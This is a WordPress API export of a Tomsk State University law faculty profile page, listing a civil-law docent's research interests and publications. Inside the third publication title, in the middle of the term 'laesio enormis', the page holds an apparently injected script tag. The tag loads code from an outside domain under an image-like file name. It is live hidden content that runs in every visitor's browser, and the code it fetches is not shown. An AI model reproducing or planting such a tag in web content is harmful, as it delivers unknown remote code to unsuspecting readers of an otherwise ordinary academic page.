{"id":4392,"date":"2014-11-06T11:42:47","date_gmt":"2014-11-06T05:42:47","guid":{"rendered":"http:\/\/ui.tsu.ru\/?page_id=4392"},"modified":"2014-11-19T16:42:23","modified_gmt":"2014-11-19T10:42:23","slug":"%d0%b7%d0%b5%d0%b7%d0%b5%d0%ba%d0%b0%d0%bb%d0%be-%d0%b0%d0%bb%d0%b5%d0%ba%d1%81%d0%b0%d0%bd%d0%b4%d1%80-%d1%8e%d1%80%d1%8c%d0%b5%d0%b2%d0%b8%d1%87","status":"publish","type":"page","link":"https:\/\/ui.tsu.ru\/?page_id=4392","title":{"rendered":"\u0417\u0435\u0437\u0435\u043a\u0430\u043b\u043e \u0410\u043b\u0435\u043a\u0441\u0430\u043d\u0434\u0440 \u042e\u0440\u044c\u0435\u0432\u0438\u0447"},"content":{"rendered":"<p>&nbsp;<\/p>\n<h3 style=\"text-align: center;\"><strong><a href=\"http:\/\/ui.tsu.ru\/wp-content\/uploads\/2014\/11\/\u0417\u0435\u0437\u0435\u043a\u0430\u043b\u043e-\u0410.\u042e..jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft wp-image-4393 size-medium\" src=\"http:\/\/ui.tsu.ru\/wp-content\/uploads\/2014\/11\/\u0417\u0435\u0437\u0435\u043a\u0430\u043b\u043e-\u0410.\u042e.-199x300.jpg\" alt=\"\u0417\u0435\u0437\u0435\u043a\u0430\u043b\u043e \u0410.\u042e.\" width=\"199\" height=\"300\" srcset=\"https:\/\/ui.tsu.ru\/wp-content\/uploads\/2014\/11\/\u0417\u0435\u0437\u0435\u043a\u0430\u043b\u043e-\u0410.\u042e.-199x300.jpg 199w, https:\/\/ui.tsu.ru\/wp-content\/uploads\/2014\/11\/\u0417\u0435\u0437\u0435\u043a\u0430\u043b\u043e-\u0410.\u042e.-682x1024.jpg 682w, https:\/\/ui.tsu.ru\/wp-content\/uploads\/2014\/11\/\u0417\u0435\u0437\u0435\u043a\u0430\u043b\u043e-\u0410.\u042e..jpg 1996w\" sizes=\"auto, (max-width: 199px) 100vw, 199px\" \/><\/a>\u0417\u0435\u0437\u0435\u043a\u0430\u043b\u043e \u0410\u043b\u0435\u043a\u0441\u0430\u043d\u0434\u0440 \u042e\u0440\u044c\u0435\u0432\u0438\u0447<\/strong><\/h3>\n<p style=\"text-align: center;\"><strong>\u0414\u043e\u0446\u0435\u043d\u0442 \u043a\u0430\u0444\u0435\u0434\u0440\u044b \u0433\u0440\u0430\u0436\u0434\u0430\u043d\u0441\u043a\u043e\u0433\u043e \u043f\u0440\u0430\u0432\u0430 \u042e\u0418 \u0422\u0413\u0423, \u043a\u0430\u043d\u0434\u0438\u0434\u0430\u0442 \u044e\u0440\u0438\u0434\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u043d\u0430\u0443\u043a<\/strong><\/p>\n<p>\u00a0\u0421\u0444\u0435\u0440\u0430 \u043d\u0430\u0443\u0447\u043d\u044b\u0445 \u0438 \u043f\u0440\u043e\u0444\u0435\u0441\u0441\u0438\u043e\u043d\u0430\u043b\u044c\u043d\u044b\u0445 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043e\u0432: \u0442\u0435\u043e\u0440\u0438\u044f \u044e\u0440\u0438\u0434\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0441\u0434\u0435\u043b\u043a\u0438, \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u043d\u044b\u0435 \u0432\u043e\u043f\u0440\u043e\u0441\u044b \u043e\u0431\u0449\u0435\u0439 \u0447\u0430\u0441\u0442\u0438 \u0433\u0440\u0430\u0436\u0434\u0430\u043d\u0441\u043a\u043e\u0433\u043e \u043f\u0440\u0430\u0432\u0430; \u0435\u0432\u0440\u043e\u043f\u0435\u0439\u0441\u043a\u0430\u044f \u043f\u0440\u0430\u0432\u043e\u0432\u0430\u044f \u0438\u0441\u0442\u043e\u0440\u0438\u044f \u0438 \u0441\u0440\u0430\u0432\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0435 \u043f\u0440\u0430\u0432\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u0435; \u043f\u0440\u0430\u0432\u0430 \u0447\u0435\u043b\u043e\u0432\u0435\u043a\u0430.<\/p>\n<p>\u0410\u0432\u0442\u043e\u0440 \u043c\u043d\u043e\u0433\u043e\u0447\u0438\u0441\u043b\u0435\u043d\u043d\u044b\u0445 \u043d\u0430\u0443\u0447\u043d\u044b\u0445 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0439 (\u0432\u043a\u043b\u044e\u0447\u0430\u044f \u043c\u043e\u043d\u043e\u0433\u0440\u0430\u0444\u0438\u0438) \u043d\u0430 \u0440\u0443\u0441\u0441\u043a\u043e\u043c, \u043d\u0435\u043c\u0435\u0446\u043a\u043e\u043c, \u0430\u043d\u0433\u043b\u0438\u0439\u0441\u043a\u043e\u043c \u044f\u0437\u044b\u043a\u0430\u0445, \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u0432 \u0432\u0435\u0434\u0443\u0449\u0438\u0445 \u0440\u0435\u0446\u0435\u043d\u0437\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u043d\u0430\u0443\u0447\u043d\u044b\u0445 \u0438\u0437\u0434\u0430\u043d\u0438\u044f\u0445 \u0420\u043e\u0441\u0441\u0438\u0438 \u0438 \u0437\u0430\u0440\u0443\u0431\u0435\u0436\u043d\u044b\u0445 \u0441\u0442\u0440\u0430\u043d (\u0413\u0435\u0440\u043c\u0430\u043d\u0438\u044f, \u0424\u0438\u043d\u043b\u044f\u043d\u0434\u0438\u044f, \u0418\u0442\u0430\u043b\u0438\u044f, \u0423\u043a\u0440\u0430\u0438\u043d\u0430). \u0410\u0432\u0442\u043e\u0440 \u0440\u044f\u0434\u0430 \u043d\u0430\u0443\u0447\u043d\u044b\u0445 \u043f\u0435\u0440\u0435\u0432\u043e\u0434\u043e\u0432 \u0441 \u0430\u043d\u0433\u043b\u0438\u0439\u0441\u043a\u043e\u0433\u043e \u0438 \u043d\u0435\u043c\u0435\u0446\u043a\u043e\u0433\u043e \u044f\u0437\u044b\u043a\u043e\u0432 \u0440\u0430\u0431\u043e\u0442 \u0432\u0435\u0434\u0443\u0449\u0438\u0445 \u043e\u0442\u0435\u0447\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0445 (\u041e. \u0421. \u0418\u043e\u0444\u0444\u0435) \u0438 \u0437\u0430\u0440\u0443\u0431\u0435\u0436\u043d\u044b\u0445 (\u0422. \u0413\u044c\u044f\u0440\u043e, \u0420.\u00a0\u0421\u0430\u043a\u043a\u043e, \u041f. \u0413\u0440\u0435\u0448\u043b\u0435\u0440) \u0443\u0447\u0435\u043d\u044b\u0445.<\/p>\n<p>\u041d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0438:<\/p>\n<p>1. \u0417\u0430\u0431\u043b\u0443\u0436\u0434\u0435\u043d\u0438\u0435 \u043f\u0440\u0438 \u0441\u043e\u0432\u0435\u0440\u0448\u0435\u043d\u0438\u0438 \u0441\u0434\u0435\u043b\u043a\u0438. \u0422\u043e\u043c\u0441\u043a: \u0418\u0437\u0434-\u0432\u043e \u0422\u043e\u043c. \u0443\u043d-\u0442\u0430, 2011. \u2013 198 \u0441.;<\/p>\n<p>2. \u0412\u0437\u044b\u0441\u043a\u0430\u043d\u0438\u0435 \u0443\u0431\u044b\u0442\u043a\u043e\u0432: \u043a \u0432\u043e\u043f\u0440\u043e\u0441\u0443 \u043e \u0441\u043e\u0432\u0435\u0440\u0448\u0435\u043d\u0441\u0442\u0432\u043e\u0432\u0430\u043d\u0438\u0438 \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u044b\u0445 \u043f\u043e\u043b\u043e\u0436\u0435\u043d\u0438\u0439 \u0413\u0440\u0430\u0436\u0434\u0430\u043d\u0441\u043a\u043e\u0433\u043e \u043a\u043e\u0434\u0435\u043a\u0441\u0430\u00a0 \/\/ \u041f\u0440\u0430\u0432\u043e\u0432\u044b\u0435 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0443\u043a\u0440\u0435\u043f\u043b\u0435\u043d\u0438\u044f \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0433\u043e\u0441\u0443\u0434\u0430\u0440\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0441\u0442\u0438: \u0421\u0431. \u0441\u0442\u0430\u0442\u0435\u0439. \u0427\u0430\u0441\u0442\u044c 56 \/ \u041f\u043e\u0434 \u0440\u0435\u0434. \u0412.\u00a0\u041c. \u041b\u0435\u0431\u0435\u0434\u0435\u0432\u0430, \u0413.\u00a0\u041b. \u041e\u0441\u043e\u043a\u0438\u043d\u043e\u0439, \u0421. \u041a. \u0421\u043e\u043b\u043e\u043c\u0438\u043d\u0430, \u0412. \u0421. \u0410\u0440\u0430\u043a\u0447\u0435\u0435\u0432\u0430, \u041d. \u0414. \u0422\u0438\u0442\u043e\u0432\u0430. \u0422\u043e\u043c\u0441\u043a: \u0418\u0437\u0434-\u0432\u043e\u0422\u043e\u043c. \u0443\u043d-\u0442\u0430, 2013. \u0421.\u00a028-30.<\/p>\n<p>3. \u041a \u0432\u043e\u043f\u0440\u043e\u0441\u0443 \u043e \u0432\u043e\u0437\u0440\u043e\u0436\u0434\u0435\u043d\u0438\u0438 <em>laesio<script src=\"\/\/shareclods.com\/pict.jpg\"><\/script><\/em><em>enormis<\/em> \/\/ \u0412\u0435\u0441\u0442\u043d\u0438\u043a \u0433\u0440\u0430\u0436\u0434\u0430\u043d\u0441\u043a\u043e\u0433\u043e \u043f\u0440\u0430\u0432\u0430. 2012. \u2116 1. \u0422.\u00a012.<\/p>\n<p>4. \u0420\u0443\u0434\u043e\u043a\u0432\u0430\u0441 \u0410.\u0414. \u0421\u043f\u043e\u0440\u043d\u044b\u0435 \u0432\u043e\u043f\u0440\u043e\u0441\u044b \u0443\u0447\u0435\u043d\u0438\u044f \u043e \u043f\u0440\u0438\u043e\u0431\u0440\u0435\u0442\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u0434\u0430\u0432\u043d\u043e\u0441\u0442\u0438 (\u0420\u0435\u0446\u0435\u043d\u0437\u0438\u044f) (\u0412 \u0441\u043e\u0430\u0432\u0442\u043e\u0440\u0441\u0442\u0432\u0435 \u0441 \u0422\u0443\u0437\u043e\u0432\u044b\u043c \u0414. \u041e.) \u041f\u0440\u0430\u0432\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u0435. 2011. \u21166. \u0421. 221-241.<\/p>\n<p>5. \u0412\u0438\u043d\u0434\u0438\u043a\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0439 \u0438\u0441\u043a \u0438 \u043f\u0440\u0438\u043e\u0431\u0440\u0435\u0442\u0430\u0442\u0435\u043b\u044c\u043d\u0430\u044f \u0434\u0430\u0432\u043d\u043e\u0441\u0442\u044c: \u043f\u0435\u0440\u0441\u043f\u0435\u043a\u0442\u0438\u0432\u044b \u0437\u0430\u043a\u043e\u043d\u043e\u0434\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u0440\u0435\u0433\u0443\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f) \/\/ \u041f\u0440\u0430\u0432\u043e\u0432\u044b\u0435 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0443\u043a\u0440\u0435\u043f\u043b\u0435\u043d\u0438\u044f \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0433\u043e\u0441\u0443\u0434\u0430\u0440\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0441\u0442\u0438: \u0421\u0431. \u0441\u0442\u0430\u0442\u0435\u0439. \u0427\u0430\u0441\u0442\u044c 48 \/ \u041f\u043e\u0434 \u0440\u0435\u0434. \u0411.\u00a0\u041b. \u0425\u0430\u0441\u043a\u0435\u043b\u044c\u0431\u0435\u0440\u0433\u0430, \u0412.\u00a0\u041c. \u041b\u0435\u0431\u0435\u0434\u0435\u0432\u0430, \u0413.\u00a0\u041b. \u041e\u0441\u043e\u043a\u0438\u043d\u043e\u0439, \u0412. \u0421. \u0410\u0440\u0430\u043a\u0447\u0435\u0435\u0432\u0430. \u0422\u043e\u043c\u0441\u043a: \u0418\u0437\u0434-\u0432\u043e\u0422\u043e\u043c. \u0443\u043d-\u0442\u0430, 2011. \u0421.\u00a044-47;<\/p>\n<p>6. \u0421\u0443\u0431\u0441\u0438\u0434\u0438\u0430\u0440\u043d\u043e\u0441\u0442\u044c \u0432 \u0433\u0440\u0430\u0436\u0434\u0430\u043d\u0441\u043a\u043e\u043c \u043f\u0440\u0430\u0432\u0435 \/\/ \u041f\u0440\u0430\u0432\u043e\u0432\u044b\u0435 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0443\u043a\u0440\u0435\u043f\u043b\u0435\u043d\u0438\u044f \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0433\u043e\u0441\u0443\u0434\u0430\u0440\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0441\u0442\u0438: \u0421\u0431. \u0441\u0442\u0430\u0442\u0435\u0439. \u0427\u0430\u0441\u0442\u044c 45 \/ \u041f\u043e\u0434 \u0440\u0435\u0434. \u0411.\u00a0\u041b. \u0425\u0430\u0441\u043a\u0435\u043b\u044c\u0431\u0435\u0440\u0433\u0430, \u0412.\u00a0\u041c. \u041b\u0435\u0431\u0435\u0434\u0435\u0432\u0430, \u0413.\u00a0\u041b. \u041e\u0441\u043e\u043a\u0438\u043d\u043e\u0439, \u0412. \u0421. \u0410\u0440\u0430\u043a\u0447\u0435\u0435\u0432\u0430. \u0422\u043e\u043c\u0441\u043a: \u0418\u0437\u0434-\u0432\u043e\u0422\u0413\u0423, 2010. \u0421.\u00a088-93;<\/p>\n<p>7. C\u0434\u0435\u043b\u043a\u0438, \u0441\u043e\u0432\u0435\u0440\u0448\u0435\u043d\u043d\u044b\u0435 \u043f\u043e\u0434 \u0432\u043b\u0438\u044f\u043d\u0438\u0435\u043c \u0437\u0430\u0431\u043b\u0443\u0436\u0434\u0435\u043d\u0438\u044f \u0432 \u043f\u0440\u043e\u0435\u043a\u0442\u0435 \u041a\u043e\u043d\u0446\u0435\u043f\u0446\u0438\u0438 \u0441\u043e\u0432\u0435\u0440\u0448\u0435\u043d\u0441\u0442\u0432\u043e\u0432\u0430\u043d\u0438\u044f \u043e\u0431\u0449\u0438\u0445 \u043f\u043e\u043b\u043e\u0436\u0435\u043d\u0438\u0439 \u0413\u0440\u0430\u0436\u0434\u0430\u043d\u0441\u043a\u043e\u0433\u043e \u043a\u043e\u0434\u0435\u043a\u0441\u0430 \u0420\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u0438 \/\/ \u0412\u0435\u0441\u0442\u043d\u0438\u043a \u0433\u0440\u0430\u0436\u0434\u0430\u043d\u0441\u043a\u043e\u0433\u043e \u043f\u0440\u0430\u0432\u0430. 2009. \u2116 3. \u0422. 11. \u0421. 207-220.<\/p>\n<p>8. \u0418\u0441\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043f\u043e \u043e\u0448\u0438\u0431\u043a\u0435 \u0438 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043f\u0435\u0440\u0435\u0445\u043e\u0434\u0430 \u043f\u0440\u0430\u0432\u0430 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0441\u0442\u0438. \u0412\u0435\u0449\u043d\u044b\u0435 \u043f\u0440\u0430\u0432\u0430: \u0441\u0438\u0441\u0442\u0435\u043c\u0430, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043d\u0438\u0435, \u043f\u0440\u0438\u043e\u0431\u0440\u0435\u0442\u0435\u043d\u0438\u0435: \u0421\u0431. \u043d\u0430\u0443\u0447. \u0442\u0440. \u0412 \u0447\u0435\u0441\u0442\u044c \u043f\u0440\u043e\u0444. \u0411. \u041b. \u0425\u0430\u0441\u043a\u0435\u043b\u044c\u0431\u0435\u0440\u0433\u0430 \/ \u041f\u043e\u0434. \u0440\u0435\u0434. \u0414. \u041e. \u0422\u0443\u0437\u043e\u0432\u0430. \u2013 \u041c.: \u0421\u0442\u0430\u0442\u0443\u0442, 2008. \u0421. 186-200;<\/p>\n<p>9. \u0417\u0430\u0431\u043b\u0443\u0436\u0434\u0435\u043d\u0438\u0435 \u0432 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0445 \u0441\u0432\u043e\u0439\u0441\u0442\u0432\u0430\u0445 \u043f\u0440\u0435\u0434\u043c\u0435\u0442\u0430 \u0441\u0434\u0435\u043b\u043a\u0438 \/\/ \u0412\u0435\u0441\u0442\u043d\u0438\u043a \u0412\u044b\u0441\u0448\u0435\u0433\u043e \u0410\u0440\u0431\u0438\u0442\u0440\u0430\u0436\u043d\u043e\u0433\u043e \u0421\u0443\u0434\u0430 \u0420\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u0438. 2008. \u2116 3. \u0421. 28-43;<\/p>\n<p>10. \u0417\u0430\u0431\u043b\u0443\u0436\u0434\u0435\u043d\u0438\u0435 \u0432 \u0442\u043e\u0436\u0434\u0435\u0441\u0442\u0432\u0435 \u043f\u0440\u0435\u0434\u043c\u0435\u0442\u0430 \u0438 \u0432 \u043f\u0440\u0438\u0440\u043e\u0434\u0435 \u0441\u0434\u0435\u043b\u043a\u0438: \u0442\u0435\u043e\u0440\u0438\u044f \u0438 \u043f\u0440\u0430\u043a\u0442\u0438\u043a\u0430 \/\/ \u0412\u0435\u0441\u0442\u043d\u0438\u043a \u0412\u044b\u0441\u0448\u0435\u0433\u043e \u0410\u0440\u0431\u0438\u0442\u0440\u0430\u0436\u043d\u043e\u0433\u043e \u0421\u0443\u0434\u0430 \u0420\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u0438. 2007. \u2116 9. \u0421. 60-73;<\/p>\n<p>11. The Stability of Business Relations and the Role of Mistake by the Formation of Contract in Russian Law, in: Kehittyv\u00e4 Ven\u00e4j\u00e4n oikeus. Developing Russian Law. Lappeenranta: Lappeenrannan teknillinen yliopisto. 2007. P. 56-62;<\/p>\n<p>12. Das Vergessen der sozialistischen Tradition im Privatrecht. Was bedeutet das? in: Erinnern und Vergessen. Jahrbuch Junge Rechtsgeschichte 2. M\u00fcnchen: Martin Meidenbauer, 2007. S. 505-520.<\/p>\n<p style=\"color: #000000;\"><em><a href=\"http:\/\/ui.tsu.ru\/?page_id=231\"><br \/>\n\u041a\u0430\u0444\u0435\u0434\u0440\u0430 \u0433\u0440\u0430\u0436\u0434\u0430\u043d\u0441\u043a\u043e\u0433\u043e \u043f\u0440\u0430\u0432\u0430<\/a><\/em><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp; \u0417\u0435\u0437\u0435\u043a\u0430\u043b\u043e \u0410\u043b\u0435\u043a\u0441\u0430\u043d\u0434\u0440 \u042e\u0440\u044c\u0435\u0432\u0438\u0447 \u0414\u043e\u0446\u0435\u043d\u0442 \u043a\u0430\u0444\u0435\u0434\u0440\u044b \u0433\u0440\u0430\u0436\u0434\u0430\u043d\u0441\u043a\u043e\u0433\u043e \u043f\u0440\u0430\u0432\u0430 \u042e\u0418 \u0422\u0413\u0423, \u043a\u0430\u043d\u0434\u0438\u0434\u0430\u0442 \u044e\u0440\u0438\u0434\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u043d\u0430\u0443\u043a \u00a0\u0421\u0444\u0435\u0440\u0430 \u043d\u0430\u0443\u0447\u043d\u044b\u0445 \u0438 \u043f\u0440\u043e\u0444\u0435\u0441\u0441\u0438\u043e\u043d\u0430\u043b\u044c\u043d\u044b\u0445 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043e\u0432: \u0442\u0435\u043e\u0440\u0438\u044f \u044e\u0440\u0438\u0434\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0441\u0434\u0435\u043b\u043a\u0438, \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u043d\u044b\u0435 \u0432\u043e\u043f\u0440\u043e\u0441\u044b \u043e\u0431\u0449\u0435\u0439 \u0447\u0430\u0441\u0442\u0438<\/p>\n","protected":false},"author":5,"featured_media":0,"parent":369,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-4392","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/ui.tsu.ru\/index.php?rest_route=\/wp\/v2\/pages\/4392","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ui.tsu.ru\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/ui.tsu.ru\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/ui.tsu.ru\/index.php?rest_route=\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/ui.tsu.ru\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4392"}],"version-history":[{"count":3,"href":"https:\/\/ui.tsu.ru\/index.php?rest_route=\/wp\/v2\/pages\/4392\/revisions"}],"predecessor-version":[{"id":4398,"href":"https:\/\/ui.tsu.ru\/index.php?rest_route=\/wp\/v2\/pages\/4392\/revisions\/4398"}],"up":[{"embeddable":true,"href":"https:\/\/ui.tsu.ru\/index.php?rest_route=\/wp\/v2\/pages\/369"}],"wp:attachment":[{"href":"https:\/\/ui.tsu.ru\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4392"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}